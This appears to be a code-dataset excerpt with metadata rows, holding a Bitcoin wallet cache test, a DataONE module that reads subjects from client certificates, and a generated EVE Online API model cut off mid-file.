    txid = "3779f27a81cdbc435ac258ce5076c211e7a953027aab42573b1b7ce9e50abe8e"
    assert txid in cm._txn_cache
    # Addresses this txn spends from / deposits to (address, expected value).
    in_addrs = ["1DpCouKa2evX3f2aELUy7iNdsrYuLLaqWy",
                "1GcmBmvYWJKLFHxrTtx5DqQLV7oHQAkH2c"]
    out_addrs = [("15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb", 1000000),
                 ("18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi", 23264)]
    assert len(cm._txns_by_addr.keys()) == 4
    # Each output index i should be recorded as a deposit for its address,
    # and each input index i as a spend for its address.
    for i, a in enumerate(out_addrs):
        assert a[0] in cm._txns_by_addr
        assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
    for i, a in enumerate(in_addrs):
        assert list(cm._spends_for_addr[a][txid]) == [i]
    # Check input and output caches
    assert txid in cm._inputs_cache
    assert len(cm._inputs_cache[txid]) == 2
    assert txid in cm._outputs_cache
    assert len(cm._outputs_cache[txid]) == 2
    assert cm._outputs_cache[txid][0]['output'] is not None
    assert cm._outputs_cache[txid][1]['output'] is not None
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
    # The outpoints consumed by this txn must now be marked SPENT.
    out_txid1 = "5dea6d825656c7f1596a04e8911fc44d15fb8da41523bf058b0f78ec6506cb9c"
    assert out_txid1 in cm._outputs_cache
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
    out_txid2 = "27876849184950b3a0e937c631ee4ece6fbffeec3a02599d05b2350291cb2424"
    assert out_txid2 in cm._outputs_cache
    assert len(cm._outputs_cache[out_txid2].keys()) == 1
    assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT
    # Only account 0 has transactions; spent-only txns are not "had".
    assert cm.has_txns()
    assert cm.has_txns(0)
    assert not cm.has_txns(1)
    assert cm.have_transaction(txid)
    assert not cm.have_transaction(out_txid1)
    assert not cm.have_transaction(out_txid2)
    assert cm.get_transaction(txid) == txn
    assert cm.get_transaction(out_txid1) is None
    assert cm.get_transaction(out_txid2) is None
    # Check balances on addresses
    addr_balances = cm.get_balances([a[0] for a in out_addrs])
    for addr, exp_bal in out_addrs:
        assert addr_balances[addr] == exp_bal
    # --- Step 2: unconfirmed -> confirmed transition. ---
    # Add a second transaction that deposits into addresses we have,
    # but insert it as unconfirmed
    txn_hex = "01000000028a9acc005a2158758e44242eee8c18fee7a43cda39a358cc783fb578cfa7cf5f000000006a47304402204a00fcb746f90095c1c50e048f1b0616b421617ca27a7a7465d4086a1623731802202404d0fce1b74f41ce1e3c63f61c8574c8cf2a5eae24ac4df714775168a9118c012102d8bfe3fd2d01f3a2b1380c34ccadcd318cafd1246f41258d7d244f409fb44c93ffffffff15857ef158778f603d34bcff74bd7935cb9d6b4a0147eea008be3f67bd395830020000006a4730440220466f93d784aa24bf497929433777fa283a7cd0000625179d3e9f5c75db4ad10f022022857a607665408a5521cbdf145c1fecd85c427ccf939c49f9a0d828a934e2530121021b5c9a9e6c97b4222c97da5a642e3531bce01b757cfdc9b29ac7d1cbf2d10710ffffffff0240420f00000000001976a91433a0a86dd9dab9902157d8d64e05fc8e0dfba16388ac7a1d0300000000001976a914134ca7427089b8f661efc9806a8418f72e57167f88ac00000000"  # nopep8
    txn = WalletTransaction.from_hex(txn_hex)
    cm.insert_txn(txn)
    txid = "d24f3b9f0aa7b6484bcea563f4c254bd24e8163906cbffc727c2b2dad43af61e"
    assert txid in cm._txn_cache
    in_addrs = ["1Ezv6YmYsZvALUaRcZRf8hBdxYni6cm78X",
                "16Mcvb7fYhif94d1RHCn5AE2dm1oXCGnH6"]
    out_addrs = [("15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8", 1000000),
                 ("12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C", 204154)]
    for i, a in enumerate(out_addrs):
        assert a[0] in cm._txns_by_addr
        assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
    for i, a in enumerate(in_addrs):
        assert list(cm._spends_for_addr[a][txid]) == [i]
    # Check input and output caches
    assert txid in cm._inputs_cache
    assert len(cm._inputs_cache[txid]) == 2
    assert txid in cm._outputs_cache
    assert cm._outputs_cache[txid][0]['output'] is not None
    assert cm._outputs_cache[txid][1]['output'] is not None
    # Statuses carry the UNCONFIRMED flag until the txn gets a block.
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
    out_txid1 = "5fcfa7cf78b53f78cc58a339da3ca4e7fe188cee2e24448e7558215a00cc9a8a"
    assert out_txid1 in cm._outputs_cache
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
    out_txid2 = "305839bd673fbe08a0ee47014a6b9dcb3579bd74ffbc343d608f7758f17e8515"
    assert out_txid2 in cm._outputs_cache
    assert len(cm._outputs_cache[out_txid2].keys()) == 1
    assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
    # Check that confirmed balances are 0 for the out_addrs
    out_a = [a[0] for a in out_addrs]
    conf_addr_balances = cm.get_balances(out_a)
    unconf_addr_balances = cm.get_balances(out_a, True)
    for addr, exp_bal in out_addrs:
        assert conf_addr_balances[addr] == 0
        assert unconf_addr_balances[addr] == exp_bal
    # Check utxos
    conf_addr_utxos = cm.get_utxos(out_a)
    unconf_addr_utxos = cm.get_utxos(out_a, True)
    for addr, exp_bal in out_addrs:
        assert addr not in conf_addr_utxos
        assert addr in unconf_addr_utxos
        assert len(unconf_addr_utxos[addr]) == 1
        utxo = unconf_addr_utxos[addr][0]
        assert utxo.value == exp_bal
        assert utxo.num_confirmations == 0
    # Reinsert the transaction with it as confirmed now
    txn = WalletTransaction.from_hex(txn_hex)
    txn.block = 374442
    txn.block_hash = Hash('000000000000000001de250dcfa47f8313aec2f1f41a56f4fb0d099eb497c2b2')
    txn.confirmations = 7684
    cm.insert_txn(txn)
    # The UNCONFIRMED flag should be cleared everywhere.
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
    assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT
    # Check the balances again
    conf_addr_balances = cm.get_balances(out_a)
    unconf_addr_balances = cm.get_balances(out_a, True)
    for addr, exp_bal in out_addrs:
        assert conf_addr_balances[addr] == exp_bal
        assert unconf_addr_balances[addr] == exp_bal
    # Check utxos again
    conf_addr_utxos = cm.get_utxos(out_a)
    unconf_addr_utxos = cm.get_utxos(out_a, True)
    for addr, exp_bal in out_addrs:
        assert addr in conf_addr_utxos
        assert addr in unconf_addr_utxos
        assert len(conf_addr_utxos[addr]) == 1
        assert len(unconf_addr_utxos[addr]) == 1
        utxo = conf_addr_utxos[addr][0]
        assert utxo.value == exp_bal
        assert utxo.num_confirmations == 7684
    # --- Step 3: provisional -> unconfirmed -> confirmed transitions. ---
    # Insert a transaction that spends from one of the out addrs in
    # the above transactions.
    # 1. Insert it provisionally
    # 2. Re-insert as unconfirmed
    # 3. Re-insert as confirmed
    txn_hex = "01000000021ef63ad4dab2c227c7ffcb063916e824bd54c2f463a5ce4b48b6a70a9f3b4fd2000000006a473044022051008f06f1fc5783364712c7bf175c383ebb92c1001ba9f744f5170d5af00bb9022012baa83b3611b2c0e637d2f5e62dd3f6f4debfca805f8a42df6719a67614824d0121027fc10ccde9240463a86c983d2c8d1301311c9debf510119418b0da7b6fdb7ee7ffffffff8ebe0ae5e97c1b3b5742ab7a0253a9e711c27650ce58c25a43bccd817af27937000000006a473044022076fd5835628d4867b489c4c7afa885de33417a3536276b3f7066155b1bd79c15022030a218c2ca35b27e2beefb2298a0bf6fc9eabe93e07f388a1a3aee878025a7b6012102bed99adff9710dbc3e9f7966037d5824ffb134aeba70aec70e34e7eeb6547a94ffffffff0240420f00000000001976a914952e023bf19047e9a014af4ec067667695d8c99488acf8340f00000000001976a914743281d388add04da28e10a12af09c853f98609888ac00000000"  # nopep8
    txn = WalletTransaction.from_hex(txn_hex)
    # First test with a very short expiration
    cm.insert_txn(txn, mark_provisional=True, expiration=1)
    txid = "6fd3c96d466cd465b40e59be14d023c27f1d0ca13075119d3d6baeebfc587b8c"
    assert txid in cm._txn_cache
    assert cm._txn_cache[txid].provisional
    # Let the provisional entry expire, then prune it away.
    time.sleep(1.5)
    cm.prune_provisional_txns()
    assert txid not in cm._txn_cache
    # Now do default expiration
    cm.insert_txn(txn, mark_provisional=True)
    assert txid in cm._txn_cache
    in_addrs = ["15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8",
                "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb"]
    out_addrs = [("1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L", 1000000),
                 ("1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm", 996600)]
    for i, a in enumerate(out_addrs):
        assert a[0] in cm._txns_by_addr
        assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
    for i, a in enumerate(in_addrs):
        assert list(cm._spends_for_addr[a][txid]) == [i]
    # Check input and output caches
    assert txid in cm._inputs_cache
    assert len(cm._inputs_cache[txid]) == 2
    assert txid in cm._outputs_cache
    assert cm._outputs_cache[txid][0]['output'] is not None
    assert cm._outputs_cache[txid][1]['output'] is not None
    # Provisional txns carry both PROVISIONAL and UNCONFIRMED flags.
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED  # nopep8
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED  # nopep8
    out_txid1 = "d24f3b9f0aa7b6484bcea563f4c254bd24e8163906cbffc727c2b2dad43af61e"
    assert out_txid1 in cm._outputs_cache
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED  # nopep8
    out_txid2 = "3779f27a81cdbc435ac258ce5076c211e7a953027aab42573b1b7ce9e50abe8e"
    assert out_txid2 in cm._outputs_cache
    assert len(cm._outputs_cache[out_txid2].keys()) == 2
    assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT | CacheManager.PROVISIONAL | CacheManager.UNCONFIRMED  # nopep8
    # Check that confirmed balances are 0 for the out_addrs
    out_a = [a[0] for a in out_addrs]
    conf_addr_balances = cm.get_balances(out_a)
    unconf_addr_balances = cm.get_balances(out_a, True)
    for addr, exp_bal in out_addrs:
        assert conf_addr_balances[addr] == 0
        assert unconf_addr_balances[addr] == exp_bal
    # Check utxos
    conf_addr_utxos = cm.get_utxos(out_a)
    unconf_addr_utxos = cm.get_utxos(out_a, True)
    for addr, exp_bal in out_addrs:
        assert addr not in conf_addr_utxos
        assert addr in unconf_addr_utxos
        assert len(unconf_addr_utxos[addr]) == 1
        utxo = unconf_addr_utxos[addr][0]
        assert utxo.value == exp_bal
        assert utxo.num_confirmations == 0
    # Re-insert as unconfirmed
    txn = WalletTransaction.from_hex(txn_hex)
    cm.insert_txn(txn, mark_provisional=False)
    # Only the statuses should change, so check those.
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT | CacheManager.UNCONFIRMED
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
    assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT | CacheManager.UNCONFIRMED
    # Re-insert as confirmed
    txn = WalletTransaction.from_hex(txn_hex)
    txn.block = 374445
    txn.block_hash = Hash("000000000000000004c241778cbbc269e912df5fe8d856efaea916daa82d2575")
    txn.confirmations = 7781
    cm.insert_txn(txn, mark_provisional=False)
    # Only the statuses should change, so check those.
    assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
    assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
    assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
    assert cm._outputs_cache[out_txid2][0]['status'] == CacheManager.SPENT
    # Check balances
    out_a = [a[0] for a in out_addrs]
    conf_addr_balances = cm.get_balances(out_a)
    unconf_addr_balances = cm.get_balances(out_a, True)
    for addr, exp_bal in out_addrs:
        assert conf_addr_balances[addr] == exp_bal
        assert unconf_addr_balances[addr] == exp_bal
    # Check utxos
    conf_addr_utxos = cm.get_utxos(out_a)
    unconf_addr_utxos = cm.get_utxos(out_a, True)
    for addr, exp_bal in out_addrs:
        assert addr in conf_addr_utxos
        assert addr in unconf_addr_utxos
        assert len(unconf_addr_utxos[addr]) == 1
        utxo = conf_addr_utxos[addr][0]
        assert utxo.value == exp_bal
        assert utxo.num_confirmations == 7781
    # Check utxos for all addresses that have deposits - we should only have 4
    addrs = ["1DpCouKa2evX3f2aELUy7iNdsrYuLLaqWy",
             "1GcmBmvYWJKLFHxrTtx5DqQLV7oHQAkH2c",
             "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8",
             "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb",
             "1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L",
             "1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm",
             "1Ezv6YmYsZvALUaRcZRf8hBdxYni6cm78X",
             "16Mcvb7fYhif94d1RHCn5AE2dm1oXCGnH6",
             "12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C",
             "18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi"]
    conf_utxos = cm.get_utxos(addrs)
    assert len(conf_utxos) == 4
    utxo_addrs_values = [("18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi", 23264),
                         ("12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C", 204154),
                         ("1EbnoKrmUEe3hsK9gTVfgYAming6BuqM3L", 1000000),
                         ("1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm", 996600)]
    for a, value in utxo_addrs_values:
        assert a in conf_utxos
        assert len(conf_utxos[a]) == 1
        assert conf_utxos[a][0].value == value
    # Fully-spent addresses must not appear in the UTXO view.
    assert "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8" not in conf_utxos
    assert "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb" not in conf_utxos
    # --- Step 4: delete the last transaction and verify rollback. ---
    # Now delete the last transaction
    cm._delete_txn(txid)
    assert txid not in cm._txn_cache
    assert txid not in cm._inputs_cache
    assert txid not in cm._outputs_cache
    for in_addr in in_addrs:
        assert in_addr not in cm._spends_for_addr
    for out_addr, _ in out_addrs:
        assert out_addr not in cm._deposits_for_addr
    # Deleting the spender restores its funding outputs to UNSPENT.
    for out_txid, index in [(out_txid1, 0), (out_txid2, 0)]:
        out = cm._outputs_cache[out_txid][index]
        assert out['status'] == CacheManager.UNSPENT
        assert out['spend_txid'] is None
        assert out['spend_index'] is None
def test_whole(cache, exp_conf_balance, exp_unconf_balance):
    """Load a serialized cache dict and check the aggregate balances.

    :param cache: dict previously produced by CacheManager serialization
    :param exp_conf_balance: expected total confirmed balance (satoshis)
    :param exp_unconf_balance: expected total unconfirmed balance (satoshis)
    """
    manager = CacheManager()
    # Don't prune for testing purposes
    manager.load_from_dict(cache, prune_provisional=False)
    hardened_account = 0x80000000
    addrs = (manager.get_addresses_for_chain(hardened_account, 0) +
             manager.get_addresses_for_chain(hardened_account, 1))
    conf_balance = sum(manager.get_balances(addrs).values())
    unconf_balance = sum(manager.get_balances(addrs, True).values())
    assert conf_balance == exp_conf_balance
    assert unconf_balance == exp_unconf_balance
| 17,618 | 0 | 69 |
b5843875e6ebc5bf39ab131cdc98ecca22a19925 | 2,696 | py | Python | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 15 | 2016-10-28T13:56:52.000Z | 2022-01-31T19:07:49.000Z | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 56 | 2017-03-16T03:52:32.000Z | 2022-03-12T01:05:28.000Z | gmn/src/d1_gmn/app/middleware/session_cert.py | DataONEorg/d1_python | dfab267c3adea913ab0e0073ed9dc1ee50b5b8eb | [
"Apache-2.0"
] | 11 | 2016-05-31T16:22:02.000Z | 2020-10-05T14:37:10.000Z | # This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract subjects from a DataONE X.509 v3 certificate.
If a certificate was provided, it has been validated by Apache before being
passed to GMN. So it is known to be signed by a trusted CA and to be unexpired.
A user can connect without providing a certificate (and so, without providing a
session). This limits the user's access to data that is publicly available.
A user can connect with a certificate that does not contain a list of
equivalent identities and group memberships (no SubjectInfo). This limits the
user's access to data that is publicly available and that is available directly
to that user (as designated in the Subject DN).
"""
import d1_common.cert.subjects
import d1_common.const
import d1_common.types.exceptions
def get_subjects(request):
    """Return (primary subject, set of equivalent subjects) for a request.

    - The primary subject is the certificate subject DN, serialized to a
      DataONE compliant subject string.
    - The equivalent set holds equivalent identities, groups and group
      memberships.
    - Connections without a client certificate resolve to the public subject
      with no equivalents.
    """
    if not _is_certificate_provided(request):
        # Anonymous connection: public subject only.
        return d1_common.const.SUBJECT_PUBLIC, set()
    try:
        return get_authenticated_subjects(request.META["SSL_CLIENT_CERT"])
    except Exception as e:
        raise d1_common.types.exceptions.InvalidToken(
            0,
            'Error extracting session from certificate. error="{}"'.format(str(e)),
        )
def get_authenticated_subjects(cert_pem):
    """Return primary subject and set of equivalents authenticated by certificate.

    ``cert_pem`` may be ``str`` or ``bytes``; str input is UTF-8 encoded
    before extraction.
    """
    pem_bytes = cert_pem.encode("utf-8") if isinstance(cert_pem, str) else cert_pem
    return d1_common.cert.subjects.extract_subjects(pem_bytes)
| 37.444444 | 87 | 0.738501 | # This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extract subjects from a DataONE X.509 v3 certificate.
If a certificate was provided, it has been validated by Apache before being
passed to GMN. So it is known to be signed by a trusted CA and to be unexpired.
A user can connect without providing a certificate (and so, without providing a
session). This limits the user's access to data that is publicly available.
A user can connect with a certificate that does not contain a list of
equivalent identities and group memberships (no SubjectInfo). This limits the
user's access to data that is publicly available and that is available directly
to that user (as designated in the Subject DN).
"""
import d1_common.cert.subjects
import d1_common.const
import d1_common.types.exceptions
def get_subjects(request):
    """Get all subjects authenticated by the request's client certificate.

    Returns a 2-tuple ``(primary_str, equivalent_set)`` where ``primary_str``
    is the certificate subject DN serialized to a DataONE compliant subject
    string and ``equivalent_set`` holds equivalent identities, groups and
    group memberships. Requests without a certificate map to the public
    subject and an empty set.
    """
    if not _is_certificate_provided(request):
        return d1_common.const.SUBJECT_PUBLIC, set()
    cert_pem = request.META["SSL_CLIENT_CERT"]
    try:
        return get_authenticated_subjects(cert_pem)
    except Exception as e:
        raise d1_common.types.exceptions.InvalidToken(
            0,
            'Error extracting session from certificate. error="{}"'.format(str(e)),
        )
def get_authenticated_subjects(cert_pem):
    """Extract the primary subject and equivalent subjects from a PEM cert.

    Accepts ``cert_pem`` as either ``str`` or ``bytes``.
    """
    if isinstance(cert_pem, str):
        return d1_common.cert.subjects.extract_subjects(cert_pem.encode("utf-8"))
    return d1_common.cert.subjects.extract_subjects(cert_pem)
def _is_certificate_provided(request):
    """Return True when the request carries a non-empty client certificate.

    A missing key and an empty-string value are both treated as "no cert";
    any other value (as set by Apache's SSL_CLIENT_CERT) counts as provided.
    """
    return request.META.get("SSL_CLIENT_CERT", "") != ""
| 104 | 0 | 23 |
85357402a8301e1bda63a84a7fda7c6d2ae1162a | 8,452 | py | Python | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | swagger_client/models/get_fw_systems_200_ok.py | rseichter/bootini-star | a80258f01a05e4df38748b8cb47dfadabd42c20d | [
"MIT"
] | null | null | null | # coding: utf-8
"""
EVE Swagger Interface
An OpenAPI for EVE Online # noqa: E501
OpenAPI spec version: 0.8.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetFwSystems200Ok(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'solar_system_id': 'int',
'owner_faction_id': 'int',
'occupier_faction_id': 'int',
'victory_points': 'int',
'victory_points_threshold': 'int',
'contested': 'bool'
}
attribute_map = {
'solar_system_id': 'solar_system_id',
'owner_faction_id': 'owner_faction_id',
'occupier_faction_id': 'occupier_faction_id',
'victory_points': 'victory_points',
'victory_points_threshold': 'victory_points_threshold',
'contested': 'contested'
}
def __init__(self, solar_system_id=None, owner_faction_id=None, occupier_faction_id=None, victory_points=None, victory_points_threshold=None, contested=None): # noqa: E501
"""GetFwSystems200Ok - a model defined in Swagger""" # noqa: E501
self._solar_system_id = None
self._owner_faction_id = None
self._occupier_faction_id = None
self._victory_points = None
self._victory_points_threshold = None
self._contested = None
self.discriminator = None
self.solar_system_id = solar_system_id
self.owner_faction_id = owner_faction_id
self.occupier_faction_id = occupier_faction_id
self.victory_points = victory_points
self.victory_points_threshold = victory_points_threshold
self.contested = contested
@property
def solar_system_id(self):
"""Gets the solar_system_id of this GetFwSystems200Ok. # noqa: E501
solar_system_id integer # noqa: E501
:return: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._solar_system_id
@solar_system_id.setter
def solar_system_id(self, solar_system_id):
"""Sets the solar_system_id of this GetFwSystems200Ok.
solar_system_id integer # noqa: E501
:param solar_system_id: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if solar_system_id is None:
raise ValueError("Invalid value for `solar_system_id`, must not be `None`") # noqa: E501
self._solar_system_id = solar_system_id
@property
def owner_faction_id(self):
"""Gets the owner_faction_id of this GetFwSystems200Ok. # noqa: E501
owner_faction_id integer # noqa: E501
:return: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._owner_faction_id
@owner_faction_id.setter
def owner_faction_id(self, owner_faction_id):
"""Sets the owner_faction_id of this GetFwSystems200Ok.
owner_faction_id integer # noqa: E501
:param owner_faction_id: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if owner_faction_id is None:
raise ValueError("Invalid value for `owner_faction_id`, must not be `None`") # noqa: E501
self._owner_faction_id = owner_faction_id
@property
def occupier_faction_id(self):
"""Gets the occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
occupier_faction_id integer # noqa: E501
:return: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._occupier_faction_id
@occupier_faction_id.setter
def occupier_faction_id(self, occupier_faction_id):
"""Sets the occupier_faction_id of this GetFwSystems200Ok.
occupier_faction_id integer # noqa: E501
:param occupier_faction_id: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if occupier_faction_id is None:
raise ValueError("Invalid value for `occupier_faction_id`, must not be `None`") # noqa: E501
self._occupier_faction_id = occupier_faction_id
@property
def victory_points(self):
"""Gets the victory_points of this GetFwSystems200Ok. # noqa: E501
victory_points integer # noqa: E501
:return: The victory_points of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points
@victory_points.setter
def victory_points(self, victory_points):
"""Sets the victory_points of this GetFwSystems200Ok.
victory_points integer # noqa: E501
:param victory_points: The victory_points of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points is None:
raise ValueError("Invalid value for `victory_points`, must not be `None`") # noqa: E501
self._victory_points = victory_points
@property
def victory_points_threshold(self):
"""Gets the victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
victory_points_threshold integer # noqa: E501
:return: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points_threshold
@victory_points_threshold.setter
def victory_points_threshold(self, victory_points_threshold):
"""Sets the victory_points_threshold of this GetFwSystems200Ok.
victory_points_threshold integer # noqa: E501
:param victory_points_threshold: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points_threshold is None:
raise ValueError("Invalid value for `victory_points_threshold`, must not be `None`") # noqa: E501
self._victory_points_threshold = victory_points_threshold
@property
def contested(self):
"""Gets the contested of this GetFwSystems200Ok. # noqa: E501
contested boolean # noqa: E501
:return: The contested of this GetFwSystems200Ok. # noqa: E501
:rtype: bool
"""
return self._contested
@contested.setter
def contested(self, contested):
"""Sets the contested of this GetFwSystems200Ok.
contested boolean # noqa: E501
:param contested: The contested of this GetFwSystems200Ok. # noqa: E501
:type: bool
"""
if contested is None:
raise ValueError("Invalid value for `contested`, must not be `None`") # noqa: E501
self._contested = contested
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetFwSystems200Ok):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.383142 | 176 | 0.635353 | # coding: utf-8
"""
EVE Swagger Interface
An OpenAPI for EVE Online # noqa: E501
OpenAPI spec version: 0.8.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetFwSystems200Ok(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'solar_system_id': 'int',
'owner_faction_id': 'int',
'occupier_faction_id': 'int',
'victory_points': 'int',
'victory_points_threshold': 'int',
'contested': 'bool'
}
attribute_map = {
'solar_system_id': 'solar_system_id',
'owner_faction_id': 'owner_faction_id',
'occupier_faction_id': 'occupier_faction_id',
'victory_points': 'victory_points',
'victory_points_threshold': 'victory_points_threshold',
'contested': 'contested'
}
def __init__(self, solar_system_id=None, owner_faction_id=None, occupier_faction_id=None, victory_points=None, victory_points_threshold=None, contested=None): # noqa: E501
"""GetFwSystems200Ok - a model defined in Swagger""" # noqa: E501
self._solar_system_id = None
self._owner_faction_id = None
self._occupier_faction_id = None
self._victory_points = None
self._victory_points_threshold = None
self._contested = None
self.discriminator = None
self.solar_system_id = solar_system_id
self.owner_faction_id = owner_faction_id
self.occupier_faction_id = occupier_faction_id
self.victory_points = victory_points
self.victory_points_threshold = victory_points_threshold
self.contested = contested
@property
def solar_system_id(self):
"""Gets the solar_system_id of this GetFwSystems200Ok. # noqa: E501
solar_system_id integer # noqa: E501
:return: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._solar_system_id
@solar_system_id.setter
def solar_system_id(self, solar_system_id):
"""Sets the solar_system_id of this GetFwSystems200Ok.
solar_system_id integer # noqa: E501
:param solar_system_id: The solar_system_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if solar_system_id is None:
raise ValueError("Invalid value for `solar_system_id`, must not be `None`") # noqa: E501
self._solar_system_id = solar_system_id
@property
def owner_faction_id(self):
"""Gets the owner_faction_id of this GetFwSystems200Ok. # noqa: E501
owner_faction_id integer # noqa: E501
:return: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._owner_faction_id
@owner_faction_id.setter
def owner_faction_id(self, owner_faction_id):
"""Sets the owner_faction_id of this GetFwSystems200Ok.
owner_faction_id integer # noqa: E501
:param owner_faction_id: The owner_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
